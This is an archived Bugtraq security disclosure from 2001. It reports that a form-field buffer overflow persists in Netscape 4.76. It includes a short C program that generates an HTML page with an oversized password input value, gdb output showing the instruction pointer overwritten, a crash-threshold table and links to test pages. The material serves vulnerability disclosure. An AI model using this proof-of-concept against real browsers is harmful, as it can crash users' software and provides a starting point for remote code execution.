Bugtraq mailing list archives

Buffer Overflow still exists in Netscape <= 4.76

From: fish stiqz <fish () ANALOG ORG>
Date: Tue, 16 Jan 2001 00:19:43 -0500

Hello.

I have noticed that the buffer overflow discovered by Michal Zalewski
and covered extensively by the different unix distributions is still
present in netscape 4.76 even though they claim it is not.

Refer to these links for background information:
http://security-archive.merton.ox.ac.uk/bugtraq-200011/0099.html
http://security-archive.merton.ox.ac.uk/bugtraq-200011/0426.html
http://www.redhat.com/support/errata/RHSA-2000-109.html

All of the above advisories (and all that I've seen) state that netscape
versions up to and including 4.75 are vulnerable, not 4.76.  I have
caused netscape 4.76 on both redhat 6.2 and slackware-current to segfault.
Below is the proof of the pudding:

On slackware-current (netscape.tgz):

 $ ./nutscrape 20000 > crash_me.html
 $ netscape -v
 Netscape 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape Communications Corp.
 $ gdb /usr/bin/netscape
 GNU gdb 5.0
 Copyright 2000 Free Software Foundation, Inc.
 GDB is free software, covered by the GNU General Public License, and you are
 welcome to change it and/or distribute copies of it under certain conditions.
 Type "show copying" to see the conditions.
 There is absolutely no warranty for GDB.  Type "show warranty" for details.
 This GDB was configured as "i386-slackware-linux"...
 (no debugging symbols found)...
 (gdb) set args http://fish.analog.org/~fish/crash_me.html
 (gdb) run
 Starting program: /usr/bin/netscape
 http://fish.analog.org/~fish/crash_me.html
 warning: Unable to find dynamic linker breakpoint function.
 GDB will be unable to debug shared library initializers
 and track explicitly loaded dynamic code.
 (no debugging symbols found)...(no debugging symbols found)...
 (no debugging symbols found)...(no debugging symbols found)...
 (no debugging symbols found)...(no debugging symbols found)...
 (no debugging symbols found)...(no debugging symbols found)...
 (no debugging symbols found)...(no debugging symbols found)...
 (no debugging symbols found)...(no debugging symbols found)...
 (no debugging symbols found)...
 Program received signal SIGSEGV, Segmentation fault.
 0x41414141 in ?? ()
 (gdb) info all-registers
 eax            0x41414141       1094795585
 ecx            0xbfffd904       -1073751804
 edx            0x91c1c00        152837120
 ebx            0x175a2c 1530412
 esp            0xbfffd83c       0xbfffd83c
 ebp            0xbfffd864       0xbfffd864
 esi            0x0      0
 edi            0x921eb8c        153217932
 eip            0x41414141       0x41414141
 eflags         0x10246  66118
<snip>


On Redhat 6.2 (netscape-communicator-4.76-0.6.2.i386.rpm):

 $ cat /etc/redhat-release
 Red Hat Linux release 6.2 (Zoot)
 $ netscape -v
 Netscape 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape Communications Corp.
 $ rpm -qa |grep netscape
 netscape-communicator-4.76-0.6.2
 netscape-common-4.76-0.6.2
 $ gdb /usr/lib/netscape/netscape-communicator
 GNU gdb 19991004
 Copyright 1998 Free Software Foundation, Inc.
 GDB is free software, covered by the GNU General Public License, and you are
 welcome to change it and/or distribute copies of it under certain conditions.
 Type "show copying" to see the conditions.
 There is absolutely no warranty for GDB.  Type "show warranty" for details.
 This GDB was configured as "i386-redhat-linux"...
 (no debugging symbols found)...
 (gdb) run http://fish.analog.org/~fish/crash_me.html
 Starting program: /usr/lib/netscape/netscape-communicator
 http://fish.analog.org/~fish/crash_me.html

 Program received signal SIGSEGV, Segmentation fault.
 0x41414141 in ?? ()Cannot access memory at address 0x7f0000
 (gdb) info all-registers
 eax            0x41414141       1094795585
 ecx            0xbfffdd14       -1073750764
 edx            0x9268200        153518592
 ebx            0x40064a2c       1074154028
 esp            0xbfffdc4c       -1073750964
 ebp            0xbfffdc74       -1073750924
 esi            0x0      0
 edi            0x92624ec        153494764
 eip            0x41414141       1094795585
 eflags         0x10246  66118
<snip>

So we see here that out eip is now 0x41414141.  This is obviously bad.
Windows versions seem to not be vulnerable, although I have only tested
this on versions 4.08 and 4.61.

If this vulnerability is exploited, an attacker could gain entrance to
potentially any computer running vulnerable versions of netscape that
visits his website.  To test if you are vulnerable, point your browser to
http://fish.analog.org/~fish/crash_netscape.html (15,000 A's) or
http://fish.analog.org/~fish/crash_netscape2.html (100,000 A's)

My Findings: (you may have to hit reload before the browser will crash):

Number of A's | Result
-------------------------------------------------------
1000            Nothing.
2000            Nothing.
5000            Memory corruption (check view source and you may see this)
7000            Continued corruption.
10000           SIGSEGV in PR_HashTableRawLookup ()
15000           SIGSEGV in _MD_GetArchitecture ()

= 20000        SIGSEGV in XFE_GetFormElementInfo ()

                And, sometimes eip overwrite.
-------------------------------------------------------

nutscrape.c is a very trivial program that generates a big html form
value in an input field, which causes the overflow.

 /*
  * nutscrape.c - fish stiqz <fish () analog org>
  * Trivial overflow in netscape.
  */

 #include <stdio.h>
 #include <stdlib.h>

 #define OVERFLOW_BYTE 0x41

 void usage(char *p)
 {
         fprintf(stderr, "usage: %s <num of %c's>\n", p, OVERFLOW_BYTE);
         exit(EXIT_FAILURE);
 }

 int main(int argc, char **argv)
 {
         int i, t;

         if(argc != 2)
                 usage(argv[0]);

         t = atoi(argv[1]);

         printf("<html>\n\n<head>\n<title>Test of Netscape</title>\n"
                "</head>\n\n<body>\n\n\n<form action=foo method=bar>\n"
                "<input type=password value=");

         for(i = 0; i < t; i++)
                 putc(OVERFLOW_BYTE, stdout);


         printf(">\nmore form tags\n</form>\n\n\n</body>\n</html>\n");

         return EXIT_SUCCESS;
 }



So, in summary, If you upgraded to netscape 4.76 to fix the buffer
overflow problem, then you upgraded in vain, the problem most
definitely still exists.

Hope you all have a good day.
- fish stiqz


shoutouts to nerile.
#TelcoNinjas suck.

--
+---------------------------------------------------------------------------+
|  fish stiqz <fish () analog org>    <*)))-<     ** yum, yum, delicious **    |
+---------------------------------------------------------------------------+

Current thread:

Buffer Overflow still exists in Netscape <= 4.76 fish stiqz (Jan 16)
- Re: Buffer Overflow still exists in Netscape <= 4.76 Szilveszter Adam (Jan 16)
- Re: Buffer Overflow still exists in Netscape <= 4.76 Frank v Waveren (Jan 16)
  - Re: Buffer Overflow still exists in Netscape <= 4.76 fish stiqz (Jan 16)
    - Re: Buffer Overflow still exists in Netscape <= 4.76 Arthur Clune (Jan 17)
    - Re: Buffer Overflow still exists in Netscape <= 4.76 Henryk Plötz (Jan 23)